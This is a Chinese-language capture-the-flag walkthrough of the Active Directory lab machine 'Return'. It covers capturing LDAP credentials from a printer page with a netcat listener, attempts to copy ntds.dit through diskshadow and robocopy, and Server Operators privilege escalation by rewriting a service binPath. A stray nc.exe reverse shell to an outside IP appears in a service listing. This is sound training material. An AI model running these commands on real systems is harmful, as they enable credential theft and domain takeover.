Tracks-AD-Return

AD
13k words

非常简单的一台适合纯新手阶段的ad机器

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
└─$ sudo nmap -sS 10.10.11.108 -p- --min-rate=3000	
Nmap scan report for 10.10.11.108
Host is up (7.9s latency).
Not shown: 61510 filtered tcp ports (no-response), 4018 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49664/tcp open  unknown
49679/tcp open  unknown


└─$ sudo nmap -sU 10.10.11.108 --top-ports=200 --min-rate=3000                                                
Warning: 10.10.11.108 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.108
Host is up (0.49s latency).
Not shown: 184 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
53/udp    open   domain
68/udp    closed dhcpc
88/udp    open   kerberos-sec
123/udp   open   ntp
389/udp   open   ldap
427/udp   closed svrloc
664/udp   closed secure-aux-bus
1028/udp  closed ms-lsa
1029/udp  closed solid-mux
1433/udp  closed ms-sql-s
3052/udp  closed apc-3052
5000/udp  closed upnps
6346/udp  closed gnutella
32770/udp closed sometimes-rpc4
33281/udp closed unknown
49196/udp closed unknown

to User

web部分是一个打印机配置的页面

alt text

我的想法是因为是ldap,还有密码,我记得在Authority有过类似的场景,ldap连接的时候会把密码给附上,所以这里也是同样,我猜他update会进行连接测试。

所以这里我把他的server地址改成我的地址,开监听

1
2
3
4
5
└─$ nc -lnvp 389  
listening on [any] 389 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.11.108] 61978
0*`%return\svc-printer�
                       1edFg43012!!

得到账号密码

1
svc-printer/1edFg43012!!

smb看了下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
└─$ smbmap -u svc-printer -p '1edFg43012!!' -H 10.10.11.108

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.108:445        Name: 10.10.11.108              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ ONLY       Remote Admin
        C$                                                      READ ONLY       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
[*] Closed 1 connections

全是可读

当时打的时候对面机器有问题,端口扫不全,这里我看到他smb全部可读盲试了下winrm,就登陆进去了

get User

to Root

本地没有什么存在问题的文件,但是权限却是拉满了基本上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

这里我一开始想用SeBackupPrivilege提权,但是存在一些问题,所以这里简单记录一下

SeBackupPrivilege

首先是diskshadow

https://pentestlab.blog/tag/diskshadow/

这里我尝试了blog中的方式,用diskshadow/s执行script

1
2
3
4
5
6
7
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\<path>\ntds.dit
delete shadows volume %someAlias%
reset

然后执行时显示,我输入的是-> set context persistent nowriter,我的结尾的s不见了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\Windows\System32> diskshadow.exe /s c:\te\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  PRINTER,  1/2/2025 12:15:42 AM

-> set context persistent nowriter

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

        CLIENTACCESSIBLE        Specify to create shadow copies usable by client versions of Windows.
        PERSISTENT              Specify that shadow copy is persist across program exit, reset or reboot.
        PERSISTENT NOWRITERS    Specify that shadow copy is persistent and all writers are excluded.
        VOLATILE                Specify that shadow copy will be deleted on exit or reset.
        VOLATILE NOWRITERS      Specify that shadow copy is volatile and all writers are excluded.

        Example: SET CONTEXT CLIENTACCESSIBLE

这里因为win和linux下的结尾换行符不一样,所以需要用到unix2dos,转一下格式

1
2
└─$ unix2dos diskshadow.txt -n diskshadow_dos.txt
unix2dos: converting file diskshadow.txt to DOS format...

这样就ok 可以看到后面的换行符

1
2
3
4
5
6
7
8
└─$ cat -v diskshadow.txt 
set context persistent nowriters^M
add volume c: alias someAlias^M
create^M
expose %someAlias% z:^M
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit^M
delete shadows volume %someAlias%^M
reset^M

当我将修改后的再一次上传执行,又报vss的错

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Windows\System32> diskshadow.exe /s c:\te\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  PRINTER,  1/2/2025 12:23:19 AM

-> set context persistent nowriters
-> add volume c: alias someAlias

COM call "(*vssObject)->InitializeForBackup" failed.

然后看了下,是因为没有起vss服务,所以diskshadow不行

而后又尝试了robocopy,这一次是ntds.dit被占用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PS C:\te> robocopy /B C:\Windows\NTDS .\ntds ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, January 2, 2025 1:20:47 AM
   Source : C:\Windows\NTDS\ 
     Dest : C:\te\ntds\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

          New Dir          1    C:\Windows\NTDS\
            New File              16.0 m        ntds.dit
2025/01/02 01:20:47 ERROR 32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit
The process cannot access the file because it is being used by another process.
Waiting 30 seconds...

然后我又尝试了wbadmin,这里参考的ippsec在Blackfield中的操作

https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s

同样的也是有问题,忘记是依赖于vss服务还是啥了。

而后尝试了dll库加载copy文件

https://github.com/giuliano108/SeBackupPrivilege

同样的也是ntds.dit正在使用

1
2
3
4
5
6
Copy-FileSeBackupPrivilege : Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit c:\te\ntds.dit -O ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
    + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege

这台机器就逼着用别的方式来做,好无语

Server Operators

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
PS C:\te\whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

可以看到组是Server Operators,这么多权限也是这个原因

微软文档中也有相对详细的介绍

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#server-operators

摘自上文:

服务器操作员

erver Operators 组的成员可以管理域控制器。此组仅存在于域控制器上。默认情况下,该组没有成员。Server Operators 组的成员可以执行以下操作:以交互方式登录到服务器、创建和删除网络共享资源、启动和停止服务、备份和还原文件、格式化计算机的硬盘驱动器以及关闭计算机。此组不能重命名、删除或移除。

默认情况下,此内置组没有成员。该组有权访问域控制器上的服务器配置选项。其成员身份由域中的服务管理员组 Administrators 和 Domain Admins 以及林根域中的 Enterprise Admins 组控制。此组中的成员无法更改任何管理组成员身份。此组被视为服务管理员帐户,因为其成员可以物理访问域控制器。此组的成员可以执行备份和还原等维护任务,并且可以更改安装在域控制器上的二进制文件。请参阅下表中的组默认用户权限。

参考下文

https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

所以这里选中一个service修改配置,而后重启服务就好

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\temp> services

Path                                                                                                                 Privileges Service          
----                                                                                                                 ---------- -------          
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS             
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796    
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost         
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense            
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller 
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService    
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                        True VMTools          
C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.3 6666                                                           True VSS              
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc         
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend        
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc

这里我也和文中一样,使用的vmtools,先修改vmtools的config,为我们要执行的载荷,这里我把当前用户加到组里。

1
2
*Evil-WinRM* PS C:\temp> sc.exe config VMTools  binPath="cmd.exe /c net localgroup administrators svc-printer /add"
[SC] ChangeServiceConfig SUCCESS

而后停止他的服务

1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\temp> sc.exe stop VMTools                                                             
SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

再一次确认服务状态,确实是成功停了

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\temp> sc.exe query VMTools

SERVICE_NAME: VMTools
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

启动服务,这里执行后会报错,因为我们本来让他执行的也不是他的服务所以不会返回给她正经请求也是正常的(笑,但是我们的加组操作却是正常执行的。

1
2
3
4
*Evil-WinRM* PS C:\temp> sc.exe start VMTools
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

这里因为我用的evil-winrm,并没有退出重新登陆,所以直接whoami /all是不会看到被加到了admin组

但是可以通过net localgroup administrators来查看

1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\users\administrator\desktop> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.

但是这里不退出重新登陆的话还是无法执行admin组的操作权限,所以还是需要重新登陆才可以拿root.txt,这个的原理和票据用户更新权限后,需要重新获取票据,是同样的原理。

重新登陆后 whoami /groups,即可看到admin组,且可以正常执行操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators                   Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

get ROOT

要是vss之类的能打开的话是一台不错的环境测试机器